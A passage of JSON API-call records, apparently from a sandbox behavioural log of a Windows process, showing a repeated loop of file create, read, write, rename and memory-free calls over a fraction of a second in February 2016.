{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,334", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,344", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,354", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,354", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,365", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,385", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,445", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,455", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,485", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,495", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,505", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,505", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,535", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,575", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,575", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,575", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,575", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,585", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,605", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,625", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,625", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,655", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,675", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtReadFile"}, {"category": "filesystem", 